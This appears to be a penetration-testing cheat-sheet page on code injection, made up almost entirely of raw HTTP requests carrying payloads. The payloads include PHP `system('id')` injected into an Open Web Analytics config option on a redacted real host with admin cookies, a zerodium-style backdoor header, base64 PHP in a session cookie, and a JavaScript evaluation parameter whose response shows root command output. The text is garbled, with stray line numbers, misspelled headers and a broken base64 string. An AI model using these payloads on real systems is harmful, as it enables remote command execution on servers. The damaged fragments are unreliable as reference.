Code Injection
Check List
Methodology
Black Box
Code Injection via Create Cache File
1
2
POST /index.php?owa_do=base.optionsGeneral HTTP/1.1
Host: analytics.[REDACTED].com
User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0
Connection: keep-alive
Content-Length: 95
Content-Type: application/x-www-form-urlencoded
Cookie: owa_p=8aacef0fbef40d5f8d8121ec2cc19aff386329fb030ead140fdf26491bcc5; owa_u=admin;; owa-u=admin; owa_p=8aacef0fbef40d5f8d8121ec2cc19aff386329fb030ead140fdf26491bcc5
Accept-Encoding: gzip, deflate, br
owa_action=base.optionsUpdate&owa_nonce=45faa7aae1&owa_config[darkshhadow]=<?php system('id'); ?> <--3
4
5
6
Code Injection in User-Agent
1
2
3
4
GET / HTTP/1.1
Host: example
Upgrade-Insecure-Requests: 1
User-Agenttt: zerodiumsystem('id');] <--- Code Injection
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close5
Code Injection in Cookie Parameter
1
2
GET /dashboard HTTP/1.1
Host: exmaple.com
Cookie: session=VXNlcj10ZXN0dXNlcg==3
<?php system('id'); ?>PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==4
GET /dashboard HTTP/1.1
Host: example.com
Cookie: session=PD9waHAgc3lzdGVtKCd pZCcpOyA/Pg==5
Code Injection In url Parameters
1
2
3
4
https://example.com/cms/gather/getArticle?targetUrl=http://jsonplaceholder.typicode.com/posts/1&parseData=return+process.version+||+"Code+Injection+successful"5
{
"code": 200,
"msg": "success",
"source": {
"userId": 1,
"id": 1,
"title": "sunt aut facere repellat provident occaecati excepturi optio reprehenderit",
"body": "quia et suscipit\nsuscipit recusandae consequuntur expedita et cum\nreprehenderit molestiae ut ut quas totam\nnostrum rerum est autem sunt rem eveniet architecto"
},
"data": "uid=0(root) gid=0(root) groups=0(root)\n"
}White Box
Cheat Sheet
Last updated